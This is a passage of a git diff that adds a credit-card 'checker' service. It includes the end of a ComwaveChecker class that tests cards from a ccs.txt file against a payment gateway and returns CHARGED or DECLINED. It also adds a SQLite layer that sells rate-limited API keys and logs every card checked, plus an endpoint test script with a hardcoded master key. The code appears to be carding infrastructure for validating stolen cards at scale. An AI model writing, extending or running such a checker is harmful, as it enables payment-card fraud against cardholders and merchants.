Ref: {ref_no}" + elapsed = round(time.time() - start, 2) + if result == "a": + return f"CHARGED {info} - Taken {elapsed}s" + else: + return f"DECLINED {info} - Taken {elapsed}s" + finally: + await mon.aclose() + except Exception as e: + return f"Error: {e}" + finally: + await session.aclose() + + +# ── Global instance — import this in your bot ───────────────────────────────── +checker = ComwaveChecker() + + +# ── Standalone test ─────────────────────────────────────────────────────────── +async def main(): + logging.basicConfig(level=logging.INFO, format="%(asctime)s %(message)s") + ccs_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), "ccs.txt") + ccs = open(ccs_path, "r", encoding="utf-8").read().splitlines() + ccs = [c.strip() for c in ccs if c.strip()] + if not ccs: + print("No cards") + return + + async def user_check(card, uid): + result = await checker.check_card(card, user_id=uid) + print(f"[User {uid}] {card} - {result}") + + tasks = [user_check(card, i + 1) for i, card in enumerate(ccs)] + await asyncio.gather(*tasks) + await checker.shutdown() + print("\nDone") + + +if __name__ == "__main__": + asyncio.run(main()) diff --git a/db.py b/db.py new file mode 100644 index 0000000..8536d74 --- /dev/null +++ b/db.py @@ -0,0 +1,179 @@ +""" +SQLite database layer for Gateway Checker API. +Tables: api_keys, request_log, admin_log +""" + +import aiosqlite +import secrets +import json +from datetime import datetime, timedelta, timezone + +DB_PATH = "api.db" + + +def _now() -> str: + return datetime.now(timezone.utc).isoformat() + + +async def init_db(): + async with aiosqlite.connect(DB_PATH) as db: + await db.execute(""" + CREATE TABLE IF NOT EXISTS api_keys ( + api_key TEXT PRIMARY KEY, + owner TEXT NOT NULL, + created_at TEXT NOT NULL, + expires_at TEXT, + request_limit INTEGER, + requests_used INTEGER NOT NULL DEFAULT 0, + rate_per_minute INTEGER NOT NULL DEFAULT 10, + allowed_gateways TEXT NOT NULL DEFAULT '["*"]', + is_active INTEGER NOT NULL DEFAULT 1, + is_paused INTEGER NOT NULL DEFAULT 0 + ) + """) + await db.execute(""" + CREATE TABLE IF NOT EXISTS request_log ( + id INTEGER PRIMARY KEY AUTOINCREMENT, + api_key TEXT NOT NULL, + gateway TEXT NOT NULL, + card TEXT NOT NULL, + status TEXT NOT NULL, + response_time REAL, + created_at TEXT NOT NULL, + ip_address TEXT + ) + """) + await db.execute(""" + CREATE TABLE IF NOT EXISTS admin_log ( + id INTEGER PRIMARY KEY AUTOINCREMENT, + action TEXT NOT NULL, + target_key TEXT, + details TEXT, + ip_address TEXT, + created_at TEXT NOT NULL + ) + """) + await db.execute("CREATE INDEX IF NOT EXISTS idx_log_key ON request_log(api_key)") + await db.execute("CREATE INDEX IF NOT EXISTS idx_log_created ON request_log(created_at)") + await db.commit() + + +# ── Key Management ── + +async def create_key(owner: str, gateways: list | str = "*", request_limit: int | None = None, + expires_days: int | None = None, rate_per_minute: int = 10) -> dict: + key = "sk_live_" + secrets.token_urlsafe(32) + now = _now() + expires_at = None + if expires_days: + expires_at = (datetime.now(timezone.utc) + timedelta(days=expires_days)).isoformat() + gw_json = json.dumps(gateways) if isinstance(gateways, list) else json.dumps(gateways) + + async with aiosqlite.connect(DB_PATH) as db: + await db.execute( + "INSERT INTO api_keys (api_key, owner, created_at, expires_at, request_limit, rate_per_minute, allowed_gateways) VALUES (?,?,?,?,?,?,?)", + (key, owner, now, expires_at, request_limit, rate_per_minute, gw_json) + ) + await db.commit() + return {"api_key": key, "owner": owner, "created_at": now, "expires_at": expires_at, + "request_limit": request_limit, "requests_used": 0, "rate_per_minute": rate_per_minute, + "allowed_gateways": gateways, "is_active": True, "is_paused": False} + + +async def get_key(api_key: str) -> dict | None: + async with aiosqlite.connect(DB_PATH) as db: + db.row_factory = aiosqlite.Row + async with db.execute("SELECT * FROM api_keys WHERE api_key = ?", (api_key,)) as cur: + row = await cur.fetchone() + if not row: + return None + d = dict(row) + d["allowed_gateways"] = json.loads(d["allowed_gateways"]) + d["is_active"] = bool(d["is_active"]) + d["is_paused"] = bool(d["is_paused"]) + return d + + +async def list_keys() -> list[dict]: + async with aiosqlite.connect(DB_PATH) as db: + db.row_factory = aiosqlite.Row + async with db.execute("SELECT * FROM api_keys ORDER BY created_at DESC") as cur: + rows = await cur.fetchall() + result = [] + for row in rows: + d = dict(row) + d["allowed_gateways"] = json.loads(d["allowed_gateways"]) + d["is_active"] = bool(d["is_active"]) + d["is_paused"] = bool(d["is_paused"]) + result.append(d) + return result + + +async def update_key(api_key: str, **fields) -> bool: + allowed = {"owner", "expires_at", "request_limit", "requests_used", + "rate_per_minute", "allowed_gateways", "is_active", "is_paused"} + updates = {k: v for k, v in fields.items() if k in allowed} + if not updates: + return False + if "allowed_gateways" in updates and isinstance(updates["allowed_gateways"], list): + updates["allowed_gateways"] = json.dumps(updates["allowed_gateways"]) + elif "allowed_gateways" in updates and isinstance(updates["allowed_gateways"], str): + updates["allowed_gateways"] = json.dumps(updates["allowed_gateways"]) + + set_clause = ", ".join(f"{k} = ?" for k in updates) + values = list(updates.values()) + [api_key] + + async with aiosqlite.connect(DB_PATH) as db: + cur = await db.execute(f"UPDATE api_keys SET {set_clause} WHERE api_key = ?", values) + await db.commit() + return cur.rowcount > 0 + + +async def delete_key(api_key: str) -> bool: + async with aiosqlite.connect(DB_PATH) as db: + cur = await db.execute("DELETE FROM api_keys WHERE api_key = ?", (api_key,)) + await db.commit() + return cur.rowcount > 0 + + +async def increment_usage(api_key: str): + async with aiosqlite.connect(DB_PATH) as db: + await db.execute("UPDATE api_keys SET requests_used = requests_used + 1 WHERE api_key = ?", (api_key,)) + await db.commit() + + +# ── Request Logging ── + +async def log_request(api_key: str, gateway: str, card: str, status: str, + response_time: float, ip_address: str): + async with aiosqlite.connect(DB_PATH) as db: + await db.execute( + "INSERT INTO request_log (api_key, gateway, card, status, response_time, created_at, ip_address) VALUES (?,?,?,?,?,?,?)", + (api_key, gateway, card, status, response_time, _now(), ip_address) + ) + await db.commit() + + +# ── Admin Logging ── + +async def log_admin(action: str, target_key: str | None, details: dict | None, ip_address: str): + async with aiosqlite.connect(DB_PATH) as db: + await db.execute( + "INSERT INTO admin_log (action, target_key, details, ip_address, created_at) VALUES (?,?,?,?,?)", + (action, target_key, json.dumps(details) if details else None, ip_address, _now()) + ) + await db.commit() + + +# ── Stats ── + +async def get_stats_24h() -> dict: + cutoff = (datetime.now(timezone.utc) - timedelta(hours=24)).isoformat() + async with aiosqlite.connect(DB_PATH) as db: + async with db.execute("SELECT COUNT(*) FROM request_log WHERE created_at > ?", (cutoff,)) as cur: + total = (await cur.fetchone())[0] + async with db.execute("SELECT COUNT(*) FROM request_log WHERE created_at > ? AND status = 'approved'", (cutoff,)) as cur: + approvals = (await cur.fetchone())[0] + async with db.execute("SELECT COUNT(DISTINCT api_key) FROM request_log WHERE created_at > ?", (cutoff,)) as cur: + unique_users = (await cur.fetchone())[0] + return {"total_checks_24h": total, "approvals_24h": approvals, "unique_users_24h": unique_users} diff --git a/test_api.py b/test_api.py new file mode 100644 index 0000000..9989b45 --- /dev/null +++ b/test_api.py @@ -0,0 +1,56 @@ +"""Quick test of all API endpoints.""" +import httpx +import json +import time + +BASE = "http://localhost:8000" +MASTER = "eJQV7hMfRTo-2j1f2c5po4vq4amD-F4nylHRtGPGkMU" +ADM = {"X-API-Key": MASTER} + +def p(label, r): + print(f"\n=== {label} === [{r.status_code}]") + try: + print(json.dumps(r.json(), indent=2)) + except Exception: + print(r.text) + +# Health +p("HEALTH", httpx.get(f"{BASE}/health")) + +# Create key +r = httpx.post(f"{BASE}/admin/keys", headers=ADM, json={ + "owner": "test_client", "gateways": ["comwave", "comwave3"], + "request_limit": 100, "rate_per_minute": 10 +}) +p("CREATE KEY", r) +KEY = r.json()["api_key"] +CLI = {"X-API-Key": KEY} + +# List keys +p("LIST KEYS", httpx.get(f"{BASE}/admin/keys", headers=ADM)) + +# Client usage +p("USAGE", httpx.get(f"{BASE}/api/usage", headers=CLI)) + +# Client gateways +p("GATEWAYS", httpx.get(f"{BASE}/api/gateways", headers=CLI)) + +# Client cooldown +p("COOLDOWN", httpx.get(f"{BASE}/api/cooldown", headers=CLI)) + +# Admin stats +p("STATS", httpx.get(f"{BASE}/admin/stats", headers=ADM)) + +# Security: bad key +p("BAD KEY", httpx.get(f"{BASE}/api/usage", headers={"X-API-Key": "fake"})) + +# Security: no key +p("NO KEY", httpx.get(f"{BASE}/api/usage")) + +# Security: wrong gateway +p("WRONG GW", httpx.post(f"{BASE}/api/check/fakegw", headers=CLI, json={"card": "4111111111111111|12|2025|123"})) + +# Security: bad card format +p("BAD CARD", httpx.post(f"{BASE}/api/check/comwave", headers=CLI, json={"card": "not-a-card"})) + +print("\n=== ALL ENDPOINT TESTS DONE ===")